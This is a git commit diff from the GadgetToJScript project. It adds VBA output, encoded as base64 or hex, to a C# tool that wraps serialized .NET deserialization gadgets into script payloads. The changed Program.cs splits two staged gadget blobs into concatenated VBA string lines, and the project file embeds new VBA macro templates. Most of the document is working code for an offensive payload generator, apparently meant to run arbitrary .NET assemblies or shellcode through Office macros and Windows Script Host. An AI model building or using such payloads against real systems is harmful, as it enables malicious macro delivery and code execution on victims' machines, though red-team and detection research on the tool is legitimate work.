Added Support to generate VBA scripts (hex or b64 encoded gadgets)

Author: med0x2e

.DS_Store

@@ -1,90 +1,92 @@
-<?xml version="1.0" encoding="utf-8"?>
-<Project ToolsVersion="15.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
-  <Import Project="$(MSBuildExtensionsPath)\$(MSBuildToolsVersion)\Microsoft.Common.props" Condition="Exists('$(MSBuildExtensionsPath)\$(MSBuildToolsVersion)\Microsoft.Common.props')" />
-  <PropertyGroup>
-    <Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
-    <Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
-    <ProjectGuid>{AF9C62A1-F8D2-4BE0-B019-0A7873E81EA9}</ProjectGuid>
-    <OutputType>Exe</OutputType>
-    <RootNamespace>GadgetToJScript</RootNamespace>
-    <AssemblyName>GadgetToJScript</AssemblyName>
-    <TargetFrameworkVersion>v4.6.1</TargetFrameworkVersion>
-    <FileAlignment>512</FileAlignment>
-    <AutoGenerateBindingRedirects>true</AutoGenerateBindingRedirects>
-    <Deterministic>true</Deterministic>
-  </PropertyGroup>
-  <PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
-    <PlatformTarget>AnyCPU</PlatformTarget>
-    <DebugSymbols>true</DebugSymbols>
-    <DebugType>full</DebugType>
-    <Optimize>false</Optimize>
-    <OutputPath>bin\Debug\</OutputPath>
-    <DefineConstants>DEBUG;TRACE</DefineConstants>
-    <ErrorReport>prompt</ErrorReport>
-    <WarningLevel>4</WarningLevel>
-  </PropertyGroup>
-  <PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
-    <PlatformTarget>AnyCPU</PlatformTarget>
-    <DebugType>pdbonly</DebugType>
-    <Optimize>true</Optimize>
-    <OutputPath>bin\Release\</OutputPath>
-    <DefineConstants>TRACE</DefineConstants>
-    <ErrorReport>prompt</ErrorReport>
-    <WarningLevel>4</WarningLevel>
-  </PropertyGroup>
-  <PropertyGroup Condition="'$(Configuration)|$(Platform)' == 'Debug|x86'">
-    <DebugSymbols>true</DebugSymbols>
-    <OutputPath>bin\x86\Debug\</OutputPath>
-    <DefineConstants>DEBUG;TRACE</DefineConstants>
-    <DebugType>full</DebugType>
-    <PlatformTarget>x86</PlatformTarget>
-    <ErrorReport>prompt</ErrorReport>
-    <CodeAnalysisRuleSet>MinimumRecommendedRules.ruleset</CodeAnalysisRuleSet>
-    <Prefer32Bit>true</Prefer32Bit>
-  </PropertyGroup>
-  <PropertyGroup Condition="'$(Configuration)|$(Platform)' == 'Release|x86'">
-    <OutputPath>bin\x86\Release\</OutputPath>
-    <DefineConstants>TRACE</DefineConstants>
-    <Optimize>true</Optimize>
-    <DebugType>pdbonly</DebugType>
-    <PlatformTarget>x86</PlatformTarget>
-    <ErrorReport>prompt</ErrorReport>
-    <CodeAnalysisRuleSet>MinimumRecommendedRules.ruleset</CodeAnalysisRuleSet>
-    <Prefer32Bit>true</Prefer32Bit>
-  </PropertyGroup>
-  <ItemGroup>
-    <Reference Include="NDesk.Options, Version=0.2.1.0, Culture=neutral, processorArchitecture=MSIL">
-      <HintPath>..\packages\NDesk.Options.0.2.1\lib\NDesk.Options.dll</HintPath>
-    </Reference>
-    <Reference Include="System" />
-    <Reference Include="System.Configuration" />
-    <Reference Include="System.Core" />
-    <Reference Include="System.Runtime.Remoting" />
-    <Reference Include="System.Web" />
-    <Reference Include="System.Xml.Linq" />
-    <Reference Include="System.Data.DataSetExtensions" />
-    <Reference Include="Microsoft.CSharp" />
-    <Reference Include="System.Data" />
-    <Reference Include="System.Net.Http" />
-    <Reference Include="System.Xml" />
-  </ItemGroup>
-  <ItemGroup>
-    <Compile Include="Program.cs" />
-    <Compile Include="Properties\AssemblyInfo.cs" />
-    <Compile Include="TestAssemblyLoader.cs" />
-    <Compile Include="_ASurrogateGadgetGenerator.cs" />
-    <Compile Include="_DisableTypeCheckGadgetGenerator.cs" />
-    <Compile Include="_SurrogateSelector.cs" />
-  </ItemGroup>
-  <ItemGroup>
-    <None Include="App.Config">
-      <SubType>Designer</SubType>
-    </None>
-    <None Include="packages.config" />
-    <EmbeddedResource Include="templates\htascript.template" />
-    <EmbeddedResource Include="templates\jscript.template" />
-    <EmbeddedResource Include="templates\jscript-regfree.template" />
-    <EmbeddedResource Include="templates\vbscript.template" />
-  </ItemGroup>
-  <Import Project="$(MSBuildToolsPath)\Microsoft.CSharp.targets" />
-</Project>
+<?xml version="1.0" encoding="utf-8"?>
+<Project ToolsVersion="15.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
+  <Import Project="$(MSBuildExtensionsPath)\$(MSBuildToolsVersion)\Microsoft.Common.props" Condition="Exists('$(MSBuildExtensionsPath)\$(MSBuildToolsVersion)\Microsoft.Common.props')" />
+  <PropertyGroup>
+    <Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
+    <Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
+    <ProjectGuid>{AF9C62A1-F8D2-4BE0-B019-0A7873E81EA9}</ProjectGuid>
+    <OutputType>Exe</OutputType>
+    <RootNamespace>GadgetToJScript</RootNamespace>
+    <AssemblyName>GadgetToJScript</AssemblyName>
+    <TargetFrameworkVersion>v4.6.1</TargetFrameworkVersion>
+    <FileAlignment>512</FileAlignment>
+    <AutoGenerateBindingRedirects>true</AutoGenerateBindingRedirects>
+    <Deterministic>true</Deterministic>
+  </PropertyGroup>
+  <PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
+    <PlatformTarget>AnyCPU</PlatformTarget>
+    <DebugSymbols>true</DebugSymbols>
+    <DebugType>full</DebugType>
+    <Optimize>false</Optimize>
+    <OutputPath>bin\Debug\</OutputPath>
+    <DefineConstants>DEBUG;TRACE</DefineConstants>
+    <ErrorReport>prompt</ErrorReport>
+    <WarningLevel>4</WarningLevel>
+  </PropertyGroup>
+  <PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
+    <PlatformTarget>AnyCPU</PlatformTarget>
+    <DebugType>pdbonly</DebugType>
+    <Optimize>true</Optimize>
+    <OutputPath>bin\Release\</OutputPath>
+    <DefineConstants>TRACE</DefineConstants>
+    <ErrorReport>prompt</ErrorReport>
+    <WarningLevel>4</WarningLevel>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)' == 'Debug|x86'">
+    <DebugSymbols>true</DebugSymbols>
+    <OutputPath>bin\x86\Debug\</OutputPath>
+    <DefineConstants>DEBUG;TRACE</DefineConstants>
+    <DebugType>full</DebugType>
+    <PlatformTarget>x86</PlatformTarget>
+    <ErrorReport>prompt</ErrorReport>
+    <CodeAnalysisRuleSet>MinimumRecommendedRules.ruleset</CodeAnalysisRuleSet>
+    <Prefer32Bit>true</Prefer32Bit>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)' == 'Release|x86'">
+    <OutputPath>bin\x86\Release\</OutputPath>
+    <DefineConstants>TRACE</DefineConstants>
+    <Optimize>true</Optimize>
+    <DebugType>pdbonly</DebugType>
+    <PlatformTarget>x86</PlatformTarget>
+    <ErrorReport>prompt</ErrorReport>
+    <CodeAnalysisRuleSet>MinimumRecommendedRules.ruleset</CodeAnalysisRuleSet>
+    <Prefer32Bit>true</Prefer32Bit>
+  </PropertyGroup>
+  <ItemGroup>
+    <Reference Include="NDesk.Options, Version=0.2.1.0, Culture=neutral, processorArchitecture=MSIL">
+      <HintPath>..\packages\NDesk.Options.0.2.1\lib\NDesk.Options.dll</HintPath>
+    </Reference>
+    <Reference Include="System" />
+    <Reference Include="System.Configuration" />
+    <Reference Include="System.Core" />
+    <Reference Include="System.Runtime.Remoting" />
+    <Reference Include="System.Web" />
+    <Reference Include="System.Xml.Linq" />
+    <Reference Include="System.Data.DataSetExtensions" />
+    <Reference Include="Microsoft.CSharp" />
+    <Reference Include="System.Data" />
+    <Reference Include="System.Net.Http" />
+    <Reference Include="System.Xml" />
+  </ItemGroup>
+  <ItemGroup>
+    <Compile Include="Program.cs" />
+    <Compile Include="Properties\AssemblyInfo.cs" />
+    <Compile Include="TestAssemblyLoader.cs" />
+    <Compile Include="_ASurrogateGadgetGenerator.cs" />
+    <Compile Include="_DisableTypeCheckGadgetGenerator.cs" />
+    <Compile Include="_SurrogateSelector.cs" />
+  </ItemGroup>
+  <ItemGroup>
+    <None Include="App.Config">
+      <SubType>Designer</SubType>
+    </None>
+    <None Include="packages.config" />
+    <EmbeddedResource Include="templates\htascript.template" />
+    <EmbeddedResource Include="templates\jscript.template" />
+    <EmbeddedResource Include="templates\jscript-regfree.template" />
+    <EmbeddedResource Include="templates\vbscript.template" />
+    <EmbeddedResource Include="templates\vbascripthex.template" />
+    <EmbeddedResource Include="templates\vbascriptb64.template" />
+  </ItemGroup>
+  <Import Project="$(MSBuildToolsPath)\Microsoft.CSharp.targets" />
+</Project>

GadgetToJScript/.DS_Store

@@ -1,4 +1,4 @@
-//    GadgetToJscript.
+//    GadgetToJscript.
 //    Copyright (C) Elazaar / @med0x2e 2019
 //
 //    GadgetToJscript is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by
@@ -13,10 +13,13 @@
 
 using NDesk.Options;
 using System;
+using System.Collections.Generic;
 using System.Configuration;
 using System.IO;
+using System.Linq;
 using System.Reflection;
 using System.Runtime.Serialization.Formatters.Binary;
+using System.Text;
 
 namespace GadgetToJScript{
 
@@ -31,10 +34,17 @@ enum EWSH
             hta
         }
 
+        enum ENC
+        {
+            b64,
+            hex
+        }
+
 
         private static string _wsh;
         private static string _outputFName = "test";
         private static bool _regFree = false;
+        private static string _enc = "b64";
 
         static void Main(string[] args)
         {
@@ -44,6 +54,7 @@ static void Main(string[] args)
 
             OptionSet options = new OptionSet(){
                 {"w|scriptType=","js, vbs, vba or hta", v =>_wsh=v},
+                {"e|encodeType=","VBA gadgets encoding: b64 or hex (default set to b64)", v => _enc=v},
                 {"o|output=","Generated payload output file, example: C:\\Users\\userX\\Desktop\\output (Without extension)", v =>_outputFName=v},
                 {"r|regfree","registration-free activation of .NET based COM components", v => _regFree = v != null},
                 {"h|help=","Show Help", v => show_help = v != null},
@@ -64,6 +75,12 @@ static void Main(string[] args)
                     showHelp(options);
                     return;
                 }
+
+                if (!Enum.IsDefined(typeof(ENC), _enc))
+                {
+                    showHelp(options);
+                    return;
+                }
             }
             catch (Exception e)
             {
@@ -85,10 +102,15 @@ static void Main(string[] args)
                     resourceName = "GadgetToJScript.templates.vbscript.template";
                     break;
                 case "vba":
-                    Console.WriteLine("Not supported yet, only JS, VBS and HTA are supported at the moment");
-                    return;
-                //resourceName = "GadgetToJScript.templates.vbascript.template";
-                //break;
+                    //Console.WriteLine("Not supported yet, only JS, VBS and HTA are supported at the moment");
+                    //return;
+                    if (_enc == "b64") {
+                        resourceName = "GadgetToJScript.templates.vbascriptb64.template";
+                    }
+                    else{
+                        resourceName = "GadgetToJScript.templates.vbascripthex.template";
+                    }
+                    break;
                 case "hta":
                     resourceName = "GadgetToJScript.templates.htascript.template";
                     break;
@@ -122,13 +144,62 @@ static void Main(string[] args)
 
 
             using (Stream stream = assembly.GetManifestResourceStream(resourceName))
-            using (StreamReader reader = new StreamReader(stream))
-            {
-                _wshTemplate = reader.ReadToEnd();
-                _wshTemplate = _wshTemplate.Replace("%_STAGE1_%", Convert.ToBase64String(_msStg1.ToArray()));
-                _wshTemplate = _wshTemplate.Replace("%_STAGE1Len_%", _msStg1.Length.ToString());
-                _wshTemplate = _wshTemplate.Replace("%_STAGE2_%", Convert.ToBase64String(_msStg2.ToArray()));
-                _wshTemplate = _wshTemplate.Replace("%_STAGE2Len_%", _msStg2.Length.ToString());
+
+            if (_wsh != "vba"){
+
+                using (StreamReader reader = new StreamReader(stream))
+                {
+                    _wshTemplate = reader.ReadToEnd();
+                    _wshTemplate = _wshTemplate.Replace("%_STAGE1_%", Convert.ToBase64String(_msStg1.ToArray()));
+                    _wshTemplate = _wshTemplate.Replace("%_STAGE1Len_%", _msStg1.Length.ToString());
+                    _wshTemplate = _wshTemplate.Replace("%_STAGE2_%", Convert.ToBase64String(_msStg2.ToArray()));
+                    _wshTemplate = _wshTemplate.Replace("%_STAGE2Len_%", _msStg2.Length.ToString());
+                }
+            }
+            else{
+                    List<string> stage1Lines = new List<String>();
+                    List<string> stage2Lines = new List<String>();
+
+                    if (_enc == "b64")
+                    {
+                        stage1Lines = SplitToLines(Convert.ToBase64String(_msStg1.ToArray()), 100).ToList();
+                        stage2Lines = SplitToLines(Convert.ToBase64String(_msStg2.ToArray()), 100).ToList();
+                    }
+                    else{
+                        stage1Lines = SplitToLines(BitConverter.ToString(_msStg1.ToArray()).Replace("-", ""), 100).ToList();
+                        stage2Lines = SplitToLines(BitConverter.ToString(_msStg2.ToArray()).Replace("-", ""), 100).ToList();
+                    }
+
+
+                    StringBuilder _b1 = new StringBuilder();
+                    _b1.Append("stage_1 = \"").Append(stage1Lines[0]).Append("\"");
+                    _b1.AppendLine();
+                    stage1Lines.RemoveAt(0);
+
+                    foreach (String line in stage1Lines)
+                    {
+                        _b1.Append("stage_1 = stage_1 & \"").Append(line.ToString().Trim()).Append("\"");
+                        _b1.AppendLine();
+                    }
+
+                    StringBuilder _b2 = new StringBuilder();
+                    _b2.Append("stage_2 = \"").Append(stage2Lines[0]).Append("\"");
+                    _b2.AppendLine();
+                    stage2Lines.RemoveAt(0);
+
+                    foreach (String line in stage2Lines)
+                    {
+                        _b2.Append("stage_2 = stage_2 & \"").Append(line.ToString().Trim()).Append("\"");
+                        _b2.AppendLine();
+                    }
+
+
+                    using (StreamReader reader = new StreamReader(stream))
+                {
+                    _wshTemplate = reader.ReadToEnd();
+                    _wshTemplate = _wshTemplate.Replace("%_STAGE1_%", _b1.ToString());
+                    _wshTemplate = _wshTemplate.Replace("%_STAGE2_%", _b2.ToString());
+                }
             }
 
             using (StreamWriter _generatedWSH = new StreamWriter(_outputFName + "." + _wsh))
@@ -154,5 +225,31 @@ public static byte[] readRawShellcode(string _SHFname)
             }
             return _buf;
         }
+
+        public static IEnumerable<string> SplitToLines(string stringToSplit, int maximumLineLength)
+        {
+            var words = stringToSplit.Split(' ').Concat(new[] { "" });
+            return words.Skip(1).Aggregate(words.Take(1).ToList(),
+                (a, w) =>
+                {
+                    var last = a.Last();
+                    while (last.Length > maximumLineLength)
+                    {
+                        a[a.Count() - 1] = last.Substring(0, maximumLineLength);
+                        last = last.Substring(maximumLineLength);
+                        a.Add(last);
+                    }
+                    var test = last + " " + w;
+                    if (test.Length > maximumLineLength)
+                    {
+                        a.Add(w);
+                    }
+                    else
+                    {
+                        a[a.Count() - 1] = test;
+                    }
+                    return a;
+                });
+        }
     }
 }